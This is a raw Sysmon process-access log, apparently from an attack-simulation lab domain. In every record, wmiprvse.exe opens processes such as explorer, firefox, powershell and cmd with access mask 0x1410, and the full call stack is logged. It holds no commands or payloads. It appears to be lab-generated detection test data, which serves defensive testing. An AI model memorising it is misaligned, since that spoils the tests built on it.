16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.124{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.108{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 